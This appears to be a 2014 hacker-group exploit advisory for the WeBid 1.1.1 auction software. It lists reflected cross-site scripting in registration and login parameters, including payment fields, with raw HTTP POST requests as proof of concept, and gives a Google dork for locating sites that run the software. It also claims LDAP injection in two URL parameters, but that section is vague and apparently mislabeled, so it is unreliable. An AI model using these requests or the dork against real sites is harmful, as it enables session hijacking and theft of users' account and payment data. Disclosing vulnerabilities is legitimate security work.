################################################################################################## # #Exploit Title : WeBid Version 1.1.1 multiple vulnerability #Author : Govind Singh aka NullPort #Vendor : http://www.webidsupport.com/ #Download Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download #Google Dork : "Powered by WeBid" #Date : 11/07/2014 #Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M ) #Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi #Greez to : All IHT Members # ################################################################################################### 1. Reflected Cross-Site Scripting : 2. LDAP Injection 1. http://localhost/WeBid/register.php Reflected Cross-Site Scripting in the parameters are : "TPL_name=" "TPL_nick=" "TPL_email" "TPL_year" "TPL_address" "TPL_city" "TPL_prov" "TPL_zip" "TPL_phone" "TPL_pp_email" "TPL_authnet_id" "TPL_authnet_pass" "TPL_wordpay_id" "TPL_toocheckout_id" "TPL_moneybookers_email" PoC : we can run our xss script with all these different parameters Host=localhost User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer=http://localhost/web-id/register.php Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47 Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=417 POSTDATA=csrftoken=&TPL_name=">&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first ---------------------------------------------------------------------------------------------------------------- 2. http://localhost/WeBid/user_login.php Reflected Cross-Site Scripting in the parameter is : "username" Host=localhost User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer=http://localhost/web-id/user_login.php Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47 Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=96 POSTDATA=username=">&password=&input=Login&action=login ================================================================================================================== 2. LDAP Injection PoC : http://localhost/WeBid/loader.php?js=[LDAP] http://localhost/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js; PoC http://localhost/WeBid/viewhelp.php?cat=[LDAP] Replace cat= as 1,2,3,4 ----------------------------------------------------------------------------------------------------------------------